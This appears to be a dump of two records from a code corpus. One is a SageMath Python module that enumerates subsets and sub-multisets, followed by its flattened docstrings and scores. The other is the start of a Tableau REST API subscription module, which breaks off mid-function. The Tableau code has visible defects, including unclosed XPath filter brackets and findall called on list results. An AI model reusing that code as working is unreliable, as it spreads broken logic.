r""" Subsets The combinatorial class of the subsets of a finite set. The set can be given as a list or a Set or else as an integer `n` which encodes the set `\{1,2,...,n\}`. See :class:`Subsets` for more information and examples. AUTHORS: - <NAME>: initial version - <NAME> (2009/02/06): doc improvements + new methods """ #***************************************************************************** # Copyright (C) 2007 <NAME> <<EMAIL>>, # # Distributed under the terms of the GNU General Public License (GPL) # # This code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # The full text of the GPL is available at: # # http://www.gnu.org/licenses/ #***************************************************************************** from sage.sets.set import Set from sage.rings.arith import binomial from sage.rings.integer import Integer import sage.combinat.subword as subword import sage.combinat.choose_nk as choose_nk import sage.misc.prandom as rnd import __builtin__ import itertools from combinat import CombinatorialClass from sage.sets.set import Set_object_enumerated from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets def Subsets(s, k=None, submultiset=False): """ Returns the combinatorial class of the subsets of the finite set s. The set can be given as a list, Set or any iterable convertible to a set. It can alternatively be given a non-negative integer `n` which encode the set `\{1,2,\dots,n\}` (i.e. the Sage ``range(1,s+1)``). A second optional parameter k can be given. In this case, Subsets returns the combinatorial class of subsets of s of size k. Finally the option ``submultiset`` allows one to deal with sets with repeated elements usually called multisets. 
EXAMPLES:: sage: S = Subsets([1, 2, 3]); S Subsets of {1, 2, 3} sage: S.cardinality() 8 sage: S.first() {} sage: S.last() {1, 2, 3} sage: S.random_element() {2} sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] Here is the same example where the set is given as an integer:: sage: S = Subsets(3) sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] We demonstrate various the effect of the various options:: sage: S = Subsets(3, 2); S Subsets of {1, 2, 3} of size 2 sage: S.list() [{1, 2}, {1, 3}, {2, 3}] sage: S = Subsets([1, 2, 2], submultiset=True); S SubMultiset of [1, 2, 2] sage: S.list() [[], [1], [2], [1, 2], [2, 2], [1, 2, 2]] sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 sage: S.list() [[1, 2, 2], [1, 2, 3], [2, 2, 3]] sage: S = Subsets(['a','b','a','b'], 2, submultiset=True); S.list() [['a', 'a'], ['a', 'b'], ['b', 'b']] """ if k is not None: k=Integer(k) if isinstance(s, (int, Integer)): if s < 0: raise ValueError("s must be non-negative") s = Set(range(1,s+1)) # if len(Set(s)) != len(s): # multi = True if k is None: if submultiset: return SubMultiset_s(s) else: return Subsets_s(s) else: if submultiset: return SubMultiset_sk(s, k) else: return Subsets_sk(s, k) class Subsets_s(CombinatorialClass): def __init__(self, s): """ TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets([1,2,3]) sage: TestSuite(S).run(skip=["_test_elements"]) sage: S = sage.sets.set.Set_object_enumerated([1,2]) sage: TestSuite(S).run() # todo: not implemented """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) self.s = Set(s) def __repr__(self): """ TESTS:: sage: repr(Subsets([1,2,3])) 'Subsets of {1, 2, 3}' """ return "Subsets of %s"%self.s def __contains__(self, value): """ TESTS:: 
sage: S = Subsets([1,2,3]) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S True """ value = Set(value) for v in value: if not v in self.s: return False return True def cardinality(self): r""" Returns the number of subsets of the set s. This is given by `2^{|s|}`. EXAMPLES:: sage: Subsets(Set([1,2,3])).cardinality() 8 sage: Subsets([1,2,3,3]).cardinality() 8 sage: Subsets(3).cardinality() 8 """ return Integer(2**len(self.s)) def first(self): """ Returns the first subset of s. Since we aren't restricted to subsets of a certain size, this is always the empty set. EXAMPLES:: sage: Subsets([1,2,3]).first() {} sage: Subsets(3).first() {} """ return Set([]) def last(self): """ Returns the last subset of s. Since we aren't restricted to subsets of a certain size, this is always the set s itself. EXAMPLES:: sage: Subsets([1,2,3]).last() {1, 2, 3} sage: Subsets(3).last() {1, 2, 3} """ return self.s def __iter__(self): """ Iterates through the subsets of s. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]))] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets(3)] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets([1,2,3,3])] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] """ lset = __builtin__.list(self.s) #We use the iterator for the subwords of range(len(self.s)) ind_set = lambda index_list: Set([lset[i] for i in index_list]) it = itertools.imap(ind_set, subword.Subwords(range(len(lset)))) for sub in it: yield sub def random_element(self): """ Returns a random element of the class of subsets of s (in other words, a random subset of s). EXAMPLES:: sage: Subsets(3).random_element() {2} sage: Subsets([4,5,6]).random_element() {5} """ lset = __builtin__.list(self.s) n = len(self.s) return Set(filter(lambda x: rnd.randint(0,1), lset)) def rank(self, sub): """ Returns the rank of sub as a subset of s. 
EXAMPLES:: sage: Subsets(3).rank([]) 0 sage: Subsets(3).rank([1,2]) 4 sage: Subsets(3).rank([1,2,3]) 7 sage: Subsets(3).rank([2,3,4]) == None True """ subset = Set(sub) lset = __builtin__.list(self.s) lsubset = __builtin__.list(subset) try: index_list = sorted(map(lambda x: lset.index(x), lsubset)) except ValueError: return None n = len(self.s) r = 0 for i in range(len(index_list)): r += binomial(n,i) return r + choose_nk.rank(index_list,n) def unrank(self, r): """ Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3).unrank(0) {} sage: Subsets([2,4,5]).unrank(1) {2} """ lset = __builtin__.list(self.s) n = len(lset) if r >= self.cardinality() or r < 0: return None else: for k in range(n+1): bin = binomial(n,k) if r >= bin: r = r - bin else: return Set([lset[i] for i in choose_nk.from_rank(r, n, k)]) def _an_element_(self): """ Returns an example of subset. EXAMPLES:: sage: Subsets(0)._an_element_() {} sage: Subsets(3)._an_element_() {1, 2} sage: Subsets([2,4,5])._an_element_() {2, 4} """ return self.unrank(self.cardinality() // 2) def _element_constructor_(self, x): """ TESTS:: sage: S3 = Subsets(3); S3([1,2]) {1, 2} sage: S3([0,1,2]) Traceback (most recent call last): ... 
ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} """ return Set(x) element_class = Set_object_enumerated class Subsets_sk(CombinatorialClass): def __init__(self, s, k): """ TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets(3,2) sage: TestSuite(S).run(skip=["_test_elements"]) """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) self.s = Set(s) self.k = k def __repr__(self): """ TESTS:: sage: repr(Subsets(3,2)) 'Subsets of {1, 2, 3} of size 2' """ return "Subsets of %s of size %s"%(self.s, self.k) def __contains__(self, value): """ TESTS: sage: S = Subsets([1,2,3], 2) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S False """ value = Set(value) if len(value) != self.k: return False for v in value: if not v in self.s: return False return True def cardinality(self): """ EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).cardinality() 3 sage: Subsets([1,2,3,3], 2).cardinality() 3 sage: Subsets([1,2,3], 1).cardinality() 3 sage: Subsets([1,2,3], 3).cardinality() 1 sage: Subsets([1,2,3], 0).cardinality() 1 sage: Subsets([1,2,3], 4).cardinality() 0 sage: Subsets(3,2).cardinality() 3 sage: Subsets(3,4).cardinality() 0 """ if self.k not in range(len(self.s)+1): return 0 else: return binomial(len(self.s),self.k) def first(self): """ Returns the first subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).first() {1, 2} sage: Subsets([1,2,3,3], 2).first() {1, 2} sage: Subsets(3,2).first() {1, 2} sage: Subsets(3,4).first() """ if self.k not in range(len(self.s)+1): return None else: return Set(__builtin__.list(self.s)[:self.k]) def last(self): """ Returns the last subset of s of size k. 
EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).last() {2, 3} sage: Subsets([1,2,3,3], 2).last() {2, 3} sage: Subsets(3,2).last() {2, 3} sage: Subsets(3,4).last() """ if self.k not in range(len(self.s)+1): return None else: return Set(__builtin__.list(self.s)[-self.k:]) def __iter__(self): """ Iterates through the subsets of s of size k. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]), 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets([1,2,3,3], 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets(3,2)] [{1, 2}, {1, 3}, {2, 3}] """ if self.k not in range(len(self.s)+1): return lset = __builtin__.list(self.s) #We use the iterator for the subwords of range(len(self.s)) ind_set = lambda index_list: Set([lset[i] for i in index_list]) for sub in choose_nk.ChooseNK(len(lset),self.k): yield ind_set(sub) def random_element(self): """ Returns a random element of the class of subsets of s of size k (in other words, a random subset of s of size k). EXAMPLES:: sage: Subsets(3, 2).random_element() {1, 2} sage: Subsets(3,4).random_element() is None True """ lset = __builtin__.list(self.s) n = len(self.s) if self.k not in range(len(self.s)+1): return None else: return Set([lset[i] for i in choose_nk.ChooseNK(n, self.k).random_element()]) def rank(self, sub): """ Returns the rank of sub as a subset of s of size k. EXAMPLES:: sage: Subsets(3,2).rank([1,2]) 0 sage: Subsets([2,3,4],2).rank([3,4]) 2 sage: Subsets([2,3,4],2).rank([2]) sage: Subsets([2,3,4],4).rank([2,3,4,5]) """ subset = Set(sub) lset = __builtin__.list(self.s) lsubset = __builtin__.list(subset) try: index_list = sorted(map(lambda x: lset.index(x), lsubset)) except ValueError: return None n = len(self.s) r = 0 if self.k not in range(len(self.s)+1): return None elif self.k != len(subset): return None else: return choose_nk.rank(index_list,n) def unrank(self, r): """ Returns the subset of s that has rank k. 
EXAMPLES:: sage: Subsets(3,2).unrank(0) {1, 2} sage: Subsets([2,4,5],2).unrank(0) {2, 4} """ lset = __builtin__.list(self.s) n = len(lset) if self.k not in range(len(self.s)+1): return None elif r >= self.cardinality() or r < 0: return None else: return Set([lset[i] for i in choose_nk.from_rank(r, n, self.k)]) def _an_element_(self): """ Returns an example of subset. EXAMPLES:: sage: Subsets(0,0)._an_element_() {} sage: Subsets(3,2)._an_element_() {1, 3} sage: Subsets([2,4,5],2)._an_element_() {2, 5} """ return self.unrank(self.cardinality() // 2) def _element_constructor_(self, x): """ TESTS:: sage: S32 = Subsets(3,2); S32([1,2]) {1, 2} sage: S32([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} of size 2 """ return Set(x) element_class = Set_object_enumerated class SubMultiset_s(CombinatorialClass): """ The combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S._s [1, 2, 2, 3] The positions of the unique elements in s are stored in:: sage: S._indices [0, 1, 3] and their multiplicities in:: sage: S._multiplicities [1, 2, 1] sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 sage: TestSuite(S).run() """ def __init__(self, s): """ Constructs the combinatorial class of the sub multisets of s. 
EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) s = sorted(list(s)) indices = list(sorted(Set([s.index(a) for a in s]))) multiplicities = [len([a for a in s if a == s[i]]) for i in indices] self._s = s self._indices = indices self._multiplicities = multiplicities def __repr__(self): """ TESTS:: sage: S = Subsets([1, 2, 2, 3], submultiset=True); S SubMultiset of [1, 2, 2, 3] """ return "SubMultiset of %s"%self._s def __contains__(self, s): """ TESTS:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: [] in S True sage: [1, 2, 2] in S True sage: all(i in S for i in S) True sage: [1, 2, 2, 2] in S False sage: [1, 3, 2, 2] in S True sage: [4] in S False """ return sorted(s) in subword.Subwords(self._s) def __iter__(self): """ Iterates through the subsets of the multiset ``self._s``. Note that each subset is represented by a list of its elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S.list() [[], [1], [2], [3], [1, 2], [1, 3], [2, 2], [2, 3], [1, 2, 2], [1, 2, 3], [2, 2, 3], [1, 2, 2, 3]] """ for k in range(len(self._s)+1): for s in SubMultiset_sk(self._s, k): yield s class SubMultiset_sk(SubMultiset_s): """ The combinatorial class of the subsets of size k of a multiset s. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). 
EXAMPLES:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: S._k 2 sage: S.cardinality() 4 sage: S.first() [1, 2] sage: S.last() [3, 3] sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] sage: TestSuite(S).run() """ def __init__(self, s, k): """ TEST:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] """ SubMultiset_s.__init__(self, s) self._k = k def __repr__(self): """ TESTS:: sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 """ return "SubMultiset of %s of size %s"%(self._s, self._k) def __contains__(self, s): """ TESTS:: sage: S = Subsets([1,2,2,3], 2, submultiset=True) sage: [] in S False sage: [1, 2, 2] in S False sage: all(i in S for i in S) True sage: [2, 2] in S True sage: [1, 3] in S True sage: [4] in S False sage: [3, 3] in S False """ return sorted(s) in subword.Subwords(self._s, self._k) def __iter__(self): """ Iterates through the subsets of size ``self._k`` of the multiset ``self._s``. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3],2, submultiset=True) sage: S.list() [[1, 2], [1, 3], [2, 2], [2, 3]] """ from sage.combinat.integer_vector import IntegerVectors for iv in IntegerVectors(self._k, len(self._indices), outer=self._multiplicities): yield sum([ [self._s[self._indices[i]]]*iv[i] for i in range(len(iv))], [])
en
0.609338
Subsets The combinatorial class of the subsets of a finite set. The set can be given as a list or a Set or else as an integer `n` which encodes the set `\{1,2,...,n\}`. See :class:`Subsets` for more information and examples. AUTHORS: - <NAME>: initial version - <NAME> (2009/02/06): doc improvements + new methods #***************************************************************************** # Copyright (C) 2007 <NAME> <<EMAIL>>, # # Distributed under the terms of the GNU General Public License (GPL) # # This code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # The full text of the GPL is available at: # # http://www.gnu.org/licenses/ #***************************************************************************** Returns the combinatorial class of the subsets of the finite set s. The set can be given as a list, Set or any iterable convertible to a set. It can alternatively be given a non-negative integer `n` which encode the set `\{1,2,\dots,n\}` (i.e. the Sage ``range(1,s+1)``). A second optional parameter k can be given. In this case, Subsets returns the combinatorial class of subsets of s of size k. Finally the option ``submultiset`` allows one to deal with sets with repeated elements usually called multisets. 
EXAMPLES:: sage: S = Subsets([1, 2, 3]); S Subsets of {1, 2, 3} sage: S.cardinality() 8 sage: S.first() {} sage: S.last() {1, 2, 3} sage: S.random_element() {2} sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] Here is the same example where the set is given as an integer:: sage: S = Subsets(3) sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] We demonstrate various the effect of the various options:: sage: S = Subsets(3, 2); S Subsets of {1, 2, 3} of size 2 sage: S.list() [{1, 2}, {1, 3}, {2, 3}] sage: S = Subsets([1, 2, 2], submultiset=True); S SubMultiset of [1, 2, 2] sage: S.list() [[], [1], [2], [1, 2], [2, 2], [1, 2, 2]] sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 sage: S.list() [[1, 2, 2], [1, 2, 3], [2, 2, 3]] sage: S = Subsets(['a','b','a','b'], 2, submultiset=True); S.list() [['a', 'a'], ['a', 'b'], ['b', 'b']] # if len(Set(s)) != len(s): # multi = True TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets([1,2,3]) sage: TestSuite(S).run(skip=["_test_elements"]) sage: S = sage.sets.set.Set_object_enumerated([1,2]) sage: TestSuite(S).run() # todo: not implemented TESTS:: sage: repr(Subsets([1,2,3])) 'Subsets of {1, 2, 3}' TESTS:: sage: S = Subsets([1,2,3]) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S True Returns the number of subsets of the set s. This is given by `2^{|s|}`. EXAMPLES:: sage: Subsets(Set([1,2,3])).cardinality() 8 sage: Subsets([1,2,3,3]).cardinality() 8 sage: Subsets(3).cardinality() 8 Returns the first subset of s. Since we aren't restricted to subsets of a certain size, this is always the empty set. EXAMPLES:: sage: Subsets([1,2,3]).first() {} sage: Subsets(3).first() {} Returns the last subset of s. 
Since we aren't restricted to subsets of a certain size, this is always the set s itself. EXAMPLES:: sage: Subsets([1,2,3]).last() {1, 2, 3} sage: Subsets(3).last() {1, 2, 3} Iterates through the subsets of s. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]))] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets(3)] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets([1,2,3,3])] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] #We use the iterator for the subwords of range(len(self.s)) Returns a random element of the class of subsets of s (in other words, a random subset of s). EXAMPLES:: sage: Subsets(3).random_element() {2} sage: Subsets([4,5,6]).random_element() {5} Returns the rank of sub as a subset of s. EXAMPLES:: sage: Subsets(3).rank([]) 0 sage: Subsets(3).rank([1,2]) 4 sage: Subsets(3).rank([1,2,3]) 7 sage: Subsets(3).rank([2,3,4]) == None True Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3).unrank(0) {} sage: Subsets([2,4,5]).unrank(1) {2} Returns an example of subset. EXAMPLES:: sage: Subsets(0)._an_element_() {} sage: Subsets(3)._an_element_() {1, 2} sage: Subsets([2,4,5])._an_element_() {2, 4} TESTS:: sage: S3 = Subsets(3); S3([1,2]) {1, 2} sage: S3([0,1,2]) Traceback (most recent call last): ... 
ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets(3,2) sage: TestSuite(S).run(skip=["_test_elements"]) TESTS:: sage: repr(Subsets(3,2)) 'Subsets of {1, 2, 3} of size 2' TESTS: sage: S = Subsets([1,2,3], 2) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S False EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).cardinality() 3 sage: Subsets([1,2,3,3], 2).cardinality() 3 sage: Subsets([1,2,3], 1).cardinality() 3 sage: Subsets([1,2,3], 3).cardinality() 1 sage: Subsets([1,2,3], 0).cardinality() 1 sage: Subsets([1,2,3], 4).cardinality() 0 sage: Subsets(3,2).cardinality() 3 sage: Subsets(3,4).cardinality() 0 Returns the first subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).first() {1, 2} sage: Subsets([1,2,3,3], 2).first() {1, 2} sage: Subsets(3,2).first() {1, 2} sage: Subsets(3,4).first() Returns the last subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).last() {2, 3} sage: Subsets([1,2,3,3], 2).last() {2, 3} sage: Subsets(3,2).last() {2, 3} sage: Subsets(3,4).last() Iterates through the subsets of s of size k. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]), 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets([1,2,3,3], 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets(3,2)] [{1, 2}, {1, 3}, {2, 3}] #We use the iterator for the subwords of range(len(self.s)) Returns a random element of the class of subsets of s of size k (in other words, a random subset of s of size k). EXAMPLES:: sage: Subsets(3, 2).random_element() {1, 2} sage: Subsets(3,4).random_element() is None True Returns the rank of sub as a subset of s of size k. 
EXAMPLES:: sage: Subsets(3,2).rank([1,2]) 0 sage: Subsets([2,3,4],2).rank([3,4]) 2 sage: Subsets([2,3,4],2).rank([2]) sage: Subsets([2,3,4],4).rank([2,3,4,5]) Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3,2).unrank(0) {1, 2} sage: Subsets([2,4,5],2).unrank(0) {2, 4} Returns an example of subset. EXAMPLES:: sage: Subsets(0,0)._an_element_() {} sage: Subsets(3,2)._an_element_() {1, 3} sage: Subsets([2,4,5],2)._an_element_() {2, 5} TESTS:: sage: S32 = Subsets(3,2); S32([1,2]) {1, 2} sage: S32([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} of size 2 The combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S._s [1, 2, 2, 3] The positions of the unique elements in s are stored in:: sage: S._indices [0, 1, 3] and their multiplicities in:: sage: S._multiplicities [1, 2, 1] sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 sage: TestSuite(S).run() Constructs the combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 TESTS:: sage: S = Subsets([1, 2, 2, 3], submultiset=True); S SubMultiset of [1, 2, 2, 3] TESTS:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: [] in S True sage: [1, 2, 2] in S True sage: all(i in S for i in S) True sage: [1, 2, 2, 2] in S False sage: [1, 3, 2, 2] in S True sage: [4] in S False Iterates through the subsets of the multiset ``self._s``. Note that each subset is represented by a list of its elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S.list() [[], [1], [2], [3], [1, 2], [1, 3], [2, 2], [2, 3], [1, 2, 2], [1, 2, 3], [2, 2, 3], [1, 2, 2, 3]] The combinatorial class of the subsets of size k of a multiset s. 
Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: S._k 2 sage: S.cardinality() 4 sage: S.first() [1, 2] sage: S.last() [3, 3] sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] sage: TestSuite(S).run() TEST:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] TESTS:: sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 TESTS:: sage: S = Subsets([1,2,2,3], 2, submultiset=True) sage: [] in S False sage: [1, 2, 2] in S False sage: all(i in S for i in S) True sage: [2, 2] in S True sage: [1, 3] in S True sage: [4] in S False sage: [3, 3] in S False Iterates through the subsets of size ``self._k`` of the multiset ``self._s``. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3],2, submultiset=True) sage: S.list() [[1, 2], [1, 3], [2, 2], [2, 3]]
3.062224
3
tableau_rest_api/methods/subscription.py
Kamran-ov/tableau_tools
0
6627893
from requests.exceptions import HTTPError from .rest_api_base import * class SubscriptionMethods(): def __init__(self, rest_api_base: TableauRestApiBase): self.rest_api_base = rest_api_base def __getattr__(self, attr): return getattr(self.rest_api_base, attr) def query_subscriptions(self, username_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None) -> ET.Element: self.start_log_block() subscriptions = self.query_resource('subscriptions') filters_dict = {} if subscription_subject is not None: filters_dict['subject'] = '[@subject="{}"]'.format(subscription_subject) if schedule_name_or_luid is not None: if self.is_luid(schedule_name_or_luid): filters_dict['sched'] = 'schedule[@id="{}"'.format(schedule_name_or_luid) else: filters_dict['sched'] = 'schedule[@user="{}"'.format(schedule_name_or_luid) if username_or_luid is not None: if self.is_luid(username_or_luid): filters_dict['user'] = 'user[@id="{}"]'.format(username_or_luid) else: filters_dict['user'] = 'user[@name="{}"]'.format(username_or_luid) if view_or_workbook is not None: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") # Does this search make sense my itself? 
if content_name_or_luid is not None: if self.is_luid(content_name_or_luid): filters_dict['content_luid'] = 'content[@id="{}"'.format(content_name_or_luid) else: if view_or_workbook is None: raise InvalidOptionException('view_or_workbook must be specified for content: "Workbook" or "View"') if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid) elif view_or_workbook == 'Workbook': content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid) filters_dict['content_luid'] = 'content[@id="{}"'.format(content_luid) if 'subject' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription{}'.format(filters_dict['subject']), self.ns_map) if 'user' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['user']), self.ns_map) if 'sched' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['sched']), self.ns_map) if 'content_luid' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['content_luid']), self.ns_map) self.end_log_block() return subscriptions def create_subscription(self, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, username_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None, direct_xml_request: Optional[ET.Element] = None) -> str: self.start_log_block() if direct_xml_request is not None: tsr = direct_xml_request else: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") user_luid = self.query_user_luid(username_or_luid) 
schedule_luid = self.query_schedule_luid(schedule_name_or_luid) if self.is_luid(content_name_or_luid): content_luid = content_name_or_luid else: if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid, username_or_luid=user_luid) elif view_or_workbook == 'Workbook': content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid, user_luid) else: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") tsr = ET.Element('tsRequest') s = ET.Element('subscription') s.set('subject', subscription_subject) c = ET.Element('content') c.set('type', view_or_workbook) c.set('id', content_luid) sch = ET.Element('schedule') sch.set('id', schedule_luid) u = ET.Element('user') u.set('id', user_luid) s.append(c) s.append(sch) s.append(u) tsr.append(s) url = self.build_api_url('subscriptions') try: new_subscription = self.send_add_request(url, tsr) new_subscription_luid = new_subscription.findall('.//t:subscription', self.ns_map)[0].get("id") self.end_log_block() return new_subscription_luid except RecoverableHTTPException as e: self.end_log_block() raise e except HTTPError as e: self.end_log_block() raise InvalidOptionException('Please check to make sure that you have an SMTP server configured and Subscriptions are enabled for this Server and Site') def create_subscription_to_workbook(self, subscription_subject: str, wb_name_or_luid: str, schedule_name_or_luid: str, username_or_luid: str, project_name_or_luid: Optional[str] = None) -> str: self.start_log_block() luid = self.create_subscription(subscription_subject=subscription_subject, view_or_workbook='Workbook', content_name_or_luid=wb_name_or_luid, schedule_name_or_luid=schedule_name_or_luid, username_or_luid=username_or_luid, project_name_or_luid=project_name_or_luid) 
self.end_log_block() return luid def create_subscription_to_view(self, subscription_subject: str, view_name_or_luid: str, schedule_name_or_luid: str, username_or_luid: str, wb_name_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None) -> str: self.start_log_block() luid = self.create_subscription(subscription_subject=subscription_subject, view_or_workbook='View', content_name_or_luid=view_name_or_luid, schedule_name_or_luid=schedule_name_or_luid, username_or_luid=username_or_luid, wb_name_or_luid=wb_name_or_luid, project_name_or_luid=project_name_or_luid) self.end_log_block() return luid def update_subscription(self, subscription_luid: str, subject: Optional[str] = None, schedule_luid: Optional[str] = None) -> ET.Element: if subject is None and schedule_luid is None: raise InvalidOptionException("You must pass one of subject or schedule_luid, or both") tsr = ET.Element('tsRequest') s = ET.Element('subscription') if subject is not None: s.set('subject', subject) if schedule_luid is not None: sch = ET.Element('schedule') sch.set('id', schedule_luid) s.append(sch) tsr.append(s) url = self.build_api_url("subscriptions/{}".format(subscription_luid)) response = self.send_update_request(url, tsr) self.end_log_block() return response def delete_subscriptions(self, subscription_luid_s: Union[List[str], str]): self.start_log_block() subscription_luids = self.to_list(subscription_luid_s) for subscription_luid in subscription_luids: url = self.build_api_url("subscriptions/{}".format(subscription_luid)) 